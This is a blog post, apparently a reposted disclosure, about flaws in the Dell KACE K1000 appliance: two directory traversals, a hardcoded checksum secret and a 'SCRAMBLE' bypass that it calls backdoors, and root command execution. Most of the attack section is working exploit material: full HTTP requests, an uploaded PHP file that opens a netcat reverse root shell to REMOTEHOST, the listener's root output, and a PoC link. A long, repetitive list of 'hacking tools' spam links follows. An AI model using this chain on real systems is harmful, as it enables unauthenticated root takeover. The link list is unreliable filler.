Publica tus comentarios, quejas, sugerencias, anécdotas o lo quieras decir al concho o a la comunidad universitaria enviándolo vía e-mail a la dirección que aparece aquí arriba, es decir:

comunidaduc.corcholibre@blogger.com



domingo, 23 de agosto de 2020

The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:
POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini   ;
;;;;;;;;;;;;;;;;;;;
That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:
http://targethost/service/kbot_upload.php
This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);
            return;
        }

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:
    private static function calcTokenChecksum($filename, $machineId, $mac)
    {
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
     
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
                   'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
    }
The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksumcheck, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  
 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").


The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:
    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    <?php
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 
Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:
    http://targethost/service/tmp/db.php
On our host:
    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( http://nmap.org/ncat )
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:
Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1
That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:


More information


  1. Hak5 Tools
  2. Hacking App
  3. Hacking Tools For Games
  4. Hack Tools Pc
  5. Hacking Tools Usb
  6. Hack App
  7. Best Hacking Tools 2019
  8. Hacker Tools
  9. Hack Tools For Mac
  10. Best Hacking Tools 2019
  11. Pentest Automation Tools
  12. Hacker Tools Software
  13. Hacking Tools For Kali Linux
  14. Hacker Tools List
  15. Pentest Tools Nmap
  16. Hacking Tools 2019
  17. Hacker Tools For Mac
  18. Tools For Hacker
  19. Pentest Tools Nmap
  20. Hacking Tools Software
  21. Hacker Tools Online
  22. Hacking Tools 2020
  23. Hack Tool Apk
  24. Pentest Tools Apk
  25. Pentest Tools
  26. Wifi Hacker Tools For Windows
  27. Hacking Tools For Mac
  28. Kik Hack Tools
  29. Blackhat Hacker Tools
  30. Pentest Tools Url Fuzzer
  31. Hacker Security Tools
  32. What Is Hacking Tools
  33. Hacker Search Tools
  34. Hacks And Tools
  35. Hacking Tools Kit
  36. Hack Website Online Tool
  37. Free Pentest Tools For Windows
  38. Hacking Tools Name
  39. Nsa Hack Tools Download
  40. Hack Tools For Games
  41. What Are Hacking Tools
  42. Hacking Tools Free Download
  43. Hack App
  44. New Hack Tools
  45. Tools Used For Hacking
  46. Pentest Box Tools Download
  47. Pentest Tools For Windows
  48. New Hack Tools
  49. Computer Hacker
  50. Bluetooth Hacking Tools Kali
  51. Best Hacking Tools 2020
  52. Pentest Tools Bluekeep
  53. Hacking Tools Pc
  54. Hacking Tools For Pc
  55. Pentest Tools
  56. Tools 4 Hack
  57. Pentest Reporting Tools
  58. Nsa Hack Tools Download
  59. Pentest Tools Linux
  60. Pentest Automation Tools
  61. Hackers Toolbox
  62. Hacker Tools Apk
  63. Hacking Tools And Software
  64. Underground Hacker Sites
  65. Hacker
  66. Nsa Hack Tools Download
  67. Hack Tools For Ubuntu
  68. Hacking Tools For Windows 7
  69. Hacking Tools For Windows Free Download
  70. Best Pentesting Tools 2018
  71. Termux Hacking Tools 2019
  72. Pentest Tools Android
  73. Pentest Tools Free
  74. Pentest Box Tools Download
  75. Hacking Tools For Mac
  76. Hacking Tools Online
  77. Hacker Tools 2020
  78. Hacker Tools For Ios
  79. Tools Used For Hacking
  80. Android Hack Tools Github
  81. Hacking Tools Usb
  82. Pentest Tools Linux
  83. Best Hacking Tools 2020
  84. Hacking Tools For Windows 7
  85. What Is Hacking Tools
  86. Hack Tool Apk
  87. Hackrf Tools
  88. Hacker Hardware Tools
  89. Hacker Tools Free
  90. Hacking Tools For Windows
  91. Hacker Tools Hardware
  92. Pentest Tools Open Source
  93. How To Install Pentest Tools In Ubuntu
  94. Hack Tools
  95. Hacking App
  96. Game Hacking
  97. Hacking Tools For Mac
  98. Hacker Tools Free Download
  99. Hacker Tools Linux
  100. Hacker Tools For Windows
  101. What Is Hacking Tools
  102. Nsa Hack Tools Download
  103. Hack Tools
  104. Pentest Tools Website
  105. Pentest Tools Review
  106. Hacking Tools Online
  107. Hacker Tools Linux
  108. Hacker Tools Software
  109. Github Hacking Tools
  110. Hacker Search Tools
  111. Hacking Tools And Software
  112. Install Pentest Tools Ubuntu
  113. Nsa Hack Tools
  114. Hack Tools 2019
  115. Hacker Tools Apk Download
  116. Easy Hack Tools
  117. Hack Tools For Ubuntu
  118. Hack Tools For Ubuntu
  119. Hacker Tools 2020
  120. Hack Tools Download
  121. Pentest Tools Download
  122. Hacking Tools For Beginners
  123. Hack Tools
  124. Beginner Hacker Tools
  125. Best Hacking Tools 2020
  126. Pentest Tools Kali Linux
  127. Pentest Tools For Ubuntu
  128. Hacker Tools Online
  129. Hacker Tools Apk
  130. Pentest Automation Tools
  131. Beginner Hacker Tools
  132. Pentest Tools Free
  133. Hacking Tools Pc
  134. Hacking Tools For Windows Free Download
  135. Hacking Tools For Windows Free Download
  136. Pentest Tools Nmap
  137. Hacking Tools 2020
  138. Hacking Tools Github
  139. Computer Hacker
  140. Pentest Box Tools Download
  141. Nsa Hack Tools

No hay comentarios: